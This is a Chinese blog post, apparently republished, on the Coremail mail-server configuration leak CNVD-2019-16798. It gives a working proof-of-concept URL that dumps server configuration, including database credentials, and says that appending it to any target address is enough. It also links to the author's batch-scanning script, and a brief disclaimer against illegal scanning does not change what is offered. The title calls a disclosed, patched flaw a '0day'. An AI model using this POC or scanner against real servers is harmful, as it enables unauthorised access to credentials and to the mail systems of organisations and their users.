Coremail-0day敏感文件泄露漏洞送附批量检测脚本

漏洞介绍

Coremail邮件系统是业内唯一一款商用的超大规模运营级邮件系统,开始研发于1999年 [1] ,其前身为中国第一套中文电子邮件系统163\126,目前在中国的客户包括网易系列邮箱、中国移动手机邮箱(139)等国内领先的邮箱服务运营商,以及宝钢、首钢、南方电网、农业银行、交通银行、华润、神华、华能等世界500强中国企业,截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户 [2] ,已成为中国用户实际使用最广泛的电子邮件系统。

2019年5月22日,国家信息安全漏洞共享平台(CNVD)收录了由北京天融信网络安全技术有限公司报送的Coremail邮件系统信息泄露漏洞(CNVD-2019-16798)。
由于Coremail邮件系统的mailsms模块的参数大小写敏感存在缺陷,使得攻击者利用该漏洞,在未授权的情况下,通过远程访问URL地址获知Coremail服务器的系统配置文件,造成数据库连接参数等系统敏感配置信息泄露。

**
泄露页:
Coremail-0day敏感文件泄露漏洞送附批量检测脚本_第1张图片

POC:

/mailsms/s?func=ADMIN:appState&dumpConfig=/

**
利用方式:

域名/IP等地址+POC

即可获取目标邮件服务器配置文件
配置文件包括:文件路径、IP、端口、数据库用户、密码等敏感信息。

**
Coremail-0day敏感文件泄露漏洞送附批量检测脚本_第2张图片
使用方法如下
Coremail-0day敏感文件泄露漏洞送附批量检测脚本_第3张图片
影响范围
Coremail XT 3.0.1至XT 5.0.9版本,XT 5.0.9a及以上版本已修复该漏洞。

批量测试脚本

自己写的简单脚本,大神勿喷,有意见我尽量改
**

请勿用于非法扫描!

**
链接:https://pan.baidu.com/s/12N_2uJ4w7z_M3d-RZ8tN8Q
提取码:n0xx

你可能感兴趣的:(漏洞,0day,coremail,漏洞)